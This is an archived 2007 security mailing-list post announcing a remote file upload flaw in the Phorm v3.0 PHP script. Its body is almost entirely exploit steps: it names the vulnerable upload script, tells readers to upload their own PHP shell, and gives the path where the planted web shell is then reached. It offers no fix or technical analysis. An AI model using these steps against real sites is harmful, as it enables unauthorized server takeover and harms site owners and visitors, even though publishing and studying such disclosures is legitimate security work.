OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Phorm v3.0 Remote File Upload Vulnerability

ilkerkandemirmynet.com
Date: Mon Jul 30 2007 - 14:12:06 CDT


# # # # # # # # # # # # # # # # # # # # # # # # #

# Phorm v3.0 Remote File Upload Vulnerability

# ilker kandemir <ilkerkandemir[at]mynet.com>

# Download: ftp://ftp.holotech.net/phorm/phorm.zip

# TnX.: Ajann, Dumenci, H0tTurk, Str0ke

# # # # # # # # # # # # # # # # # # # # # # # # #

# Exploit: http://[site]/[phorm_path]/lib/fileupload.php [+]=====>> upload your shell.php

# http://[site]/[phorm_path]/files/phpshell.php

# # # # # # # # # # # # # # # # # # # # # # # # #